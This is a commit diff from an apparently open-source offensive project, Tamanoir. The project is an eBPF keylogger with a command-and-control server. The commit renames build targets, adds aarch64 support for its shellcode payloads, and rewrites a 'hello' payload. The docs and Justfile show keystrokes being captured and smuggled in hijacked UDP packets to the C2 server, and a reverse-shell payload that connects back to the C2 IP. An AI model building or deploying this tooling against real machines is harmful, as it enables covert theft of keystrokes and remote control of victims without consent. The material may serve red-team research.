Shellcode implementations for aarch64 (#31)

Author: adgaultier

.github/workflows/ci.yaml

@@ -21,15 +21,15 @@ jobs:
       - run: cargo binstall -y bpf-linker
 
       - name: Build Tamanoir
-        run: just build-tamanoir
+        run: just tamanoir-build
 
       - name: Build Tamanoir-C2
         run: |
           sudo apt install -y protobuf-compiler
-          just build-c2
+          just c2-build
 
       - name: Build TUI
-        run: just build-tui
+        run: just tui-build
 
       - name: Linting
         run: |

Justfile

@@ -1,23 +1,23 @@
-set export
 _default:
     @just --list
 
 _build-ebpf:
     cd tamanoir-ebpf && cargo build  --release
 
+arch:="x86_64" # x86_64 , aarch64
 proxy_ip:="192.168.1.15"
 
 # Build Tamanoir
-build-tamanoir:
+tamanoir-build:
     just _build-ebpf
     cargo build -p tamanoir --release
 
 # Build C&C server
-build-c2:
+c2-build:
     cargo build -p tamanoir-c2 --release
 
 # Build Tui
-build-tui:
+tui-build:  
     cargo build -p tamanoir-tui --release
 
 
@@ -26,7 +26,7 @@ tamanoir-run  iface="wlan0" hijack_ip="8.8.8.8" log_level="info" :
     RUST_LOG={{log_level}} sudo -E target/release/tamanoir --proxy-ip {{proxy_ip}} --hijack-ip {{hijack_ip}} --iface {{iface}}
 
 # Run tui
-tui-run  grpc_port="50051" log_level="debug":
+tui-run  grpc_port="50051" log_level="info":
     RUST_LOG={{log_level}} target/release/tamanoir-tui -i {{proxy_ip}} -p {{grpc_port}}
 
 # Run c2 server
@@ -36,11 +36,11 @@ c2-run:
 
 # Rce build (run on c2 server)
 rce_build_reverse_shell :
-    ./target/release/tamanoir-c2  rce  build  -c ./assets/payloads/reverse-shell  -b "IP={{proxy_ip}} PORT=8082"
+    ./target/release/tamanoir-c2  rce  build  -c ./assets/payloads/reverse-shell  -b "IP={{proxy_ip}}" -t {{arch}}
 
 rce_build_hello :
-    ./target/release/tamanoir-c2  rce  build  -c ./assets/payloads/hello
+    ./target/release/tamanoir-c2  rce  build  -c ./assets/payloads/hello -t {{arch}}
 
 rce_build_xeyes :
-    ./target/release/tamanoir-c2  rce  build  -c ./assets/payloads/xeyes
+    ./target/release/tamanoir-c2  rce  build  -c ./assets/payloads/xeyes -t {{arch}}
 

README.md

@@ -5,6 +5,8 @@
   <p><small><i>A large anteater of Central and South America, Myrmecophaga tridactyla</i></small></p>
 </div>
 
+#### ⚡ Powered by [Aya](https://aya-rs.dev), [Tokio](https://github.com/tokio-rs/tokio),  [Tonic](https://github.com/hyperium/tonic) and [Ratatui](https://ratatui.rs)
+
 ## 💡Overview
 
 Tamanoir is structured around 3 components: 
@@ -25,7 +27,6 @@ The TUI client communicating with C2 server. Built on top of ratatui
   <p><small><i>Tui client demo</i></small></p>
 </div>
 
-#### ⚡ Powered by [Aya](https://aya-rs.dev), [Tokio](https://github.com/tokio-rs/tokio),  [Tonic](https://github.com/hyperium/tonic) and [Ratatui](https://ratatui.rs)
 
 
 ### Glossary

assets/doc/tamanoir-c2.md

@@ -30,7 +30,7 @@ Tamanoir comes with ready-to-use payloads :
 |----------|----------|----------|
 | hello |  prints a cute tamanoir to tamanoir stdout  | hello-world payload, demonstrate how a big payload can be transmitted by chunks to target|
 | xeyes | open `xeyes` program on target gui | demonstrate how to execute simple shellcode. Only works if target uses x11 |
-| reverse-shell | open a tcp-shell communicating with tamanoir-c2 | needs to specify IP and PORT vars when building (see below) 
+| reverse-shell | open a tcp-shell communicating with tamanoir-c2 | needs to specify IP var when building (see below) 
 
 
 ### 📍 payloads location: ./assets/payloads
@@ -54,7 +54,7 @@ Tamanoir comes with ready-to-use payloads :
 - ⚠ max payload size (once compiled and stripped) = 4096 bytes
 
 #### example: build reverse-shell 
-`tamanoir-c2  rce  build  -c ./assets/payloads/reverse-shell  -b "IP=<tamanoir-c2-ip> PORT=8082"`
+`tamanoir-c2  rce  build  -c ./assets/payloads/reverse-shell  -b "IP=<tamanoir-c2-ip>" -t x86_64`
 will compile `reverse-shell` payload:
 - for x86_64 target arch 
 - use cross to build it if current arch isn't x86_64
@@ -68,6 +68,10 @@ will compile `reverse-shell` payload:
 - ⚠ path needs to be absolute
 
 ## ⚠ Limitations
-Though it is  possible to compile payloads for `x86_64` and `aarch64` architectures, currently only `x86_64` target arch is viable for provided payloads.
-Any contributions from people knowledgable about aarch64 assembly code are welcome! (see open issues for context)
+- Cross compilation is only available  for `aarch64` ->  `x86_64` 
+- Rce payloads are for now only available for GNU toolchain
+
+
+
+
 

assets/doc/tamanoir.md

@@ -7,7 +7,7 @@
 ## Egress (eBPF Tc program)
 1. when a udp packet with destination ip `HIJACK-IP` is to be sent via selected network interface, ebpf program captures it 
 2. a payload is built, with target architecture stored as first byte 
-3. a fixed-length chunk of stored keystrokes is fetched from ringbuffer and added to payload
+3. a fixed-length chunk of stored keystrokes is fetched from ebpf queue and added to payload
 4. it is injected between layer3 (IP) and layer4 (UDP) 
 5. destination IP is replaced by Tamanoir-C2 server IP
 6. packet is then sent

assets/payloads/hello/linker.ld

@@ -8,16 +8,17 @@ SECTIONS
         *(.text.prologue)
         *(.text)
         *(.text.*)
-    }
+        *(.text.msg)
 
+    }
     . = ALIGN(16);
     .data :
     {
         *(.rodata)
         *(.rodata.*)
-        *(.data)
-
+        *(.data)    
     }
+    
     /DISCARD/ :
 	{
 		*(.interp)

assets/payloads/hello/src/main.rs

@@ -4,65 +4,79 @@
 use core::arch::asm;
 
 #[cfg(target_arch = "x86_64")]
-pub unsafe fn write(fd: usize, msg: *const u8, len: usize) -> isize {
-    let sys_nr: usize = 1;
-    let ret: isize;
-    asm!(
-    "syscall",
-    in("rax") sys_nr,
-    in("rdi") fd,
-    in("rsi") msg,
-    in("rdx") len,
-    lateout("rax") ret,
-    );
-    ret
+mod consts {
+    pub const SYS_EXIT: usize = 60;
+    pub const SYS_WRITE: usize = 1;
+}
+#[cfg(target_arch = "aarch64")]
+mod consts {
+    pub const SYS_EXIT: usize = 93;
+    pub const SYS_WRITE: usize = 64;
 }
+use consts::*;
+const HELLO: &[u8] = include_bytes!("hello.txt");
 
-#[cfg(target_arch = "x86_64")]
-pub unsafe fn exit(ret: isize) -> ! {
-    let sys_nr: usize = 60;
-    asm!(
-    "syscall",
-    in("rax") sys_nr,
-    in("rdi") ret,
-    options(noreturn),
-    );
+fn exit(ret: isize) -> ! {
+    #[cfg(target_arch = "x86_64")]
+    unsafe {
+        asm!(
+        "syscall",
+        in("rax") SYS_EXIT,
+        in("rdi") ret,
+        options(noreturn),
+        );
+    }
+    #[cfg(target_arch = "aarch64")]
+    unsafe {
+        asm!(
+        "svc #0",
+        in("x8") SYS_EXIT,
+        in("x0") ret,
+        options(noreturn),
+        );
+    }
 }
 
-#[cfg(target_arch = "aarch64")]
-pub unsafe fn write(fd: usize, msg: *const u8, len: usize) -> isize {
-    let sys_nr: usize = 64;
+fn write(fd: usize, msg: *const u8, len: usize) -> isize {
     let ret: isize;
-    asm!(
-    "svc #0",
-    in("x8") sys_nr,
-    in("x0") fd,
-    in("x1") msg,
-    in("x2") len,
-    lateout("x0") ret,
-    );
+
+    #[cfg(target_arch = "x86_64")]
+    unsafe {
+        asm!(
+            "syscall",
+            in("rax") SYS_WRITE,
+            in("rdi") fd,
+            in("rsi") msg,
+            in("rdx") len,
+            lateout("rax") ret,
+        );
+    }
+    #[cfg(target_arch = "aarch64")]
+    unsafe {
+        asm!(
+            "adr x1, {msg}", // must use PC-relative addressing! which is natural in x86, but tricky here
+            "svc #0",
+            in("x8") SYS_WRITE,
+            in("x0") fd,
+            in("x2") len,
+            lateout("x0") ret,
+            msg = sym MSG
+        );
+    }
+
     ret
 }
 
 #[cfg(target_arch = "aarch64")]
-pub unsafe fn exit(ret: isize) -> ! {
-    let sys_nr: usize = 93;
-    asm!(
-    "svc #0",
-    in("x8") sys_nr,
-    in("x0") ret,
-    options(noreturn),
-    );
-}
-
-const HELLO: &[u8] = include_bytes!("hello.txt");
+#[link_section = ".text.msg"]
+// see linker.ld : we must control where this symbol is placed otherwise it wont be reachable when elf headers are lost (raw binary )
+#[no_mangle]
+static MSG: [u8; HELLO.len()] = *include_bytes!("hello.txt");
 
 #[no_mangle]
-pub extern "C" fn _start() {
-    unsafe {
-        let _ = write(1, HELLO.as_ptr(), HELLO.len());
-        exit(0);
-    }
+fn _start() {
+    let _ = write(1, HELLO.as_ptr(), HELLO.len());
+    exit(0);
 }
 
 #[panic_handler]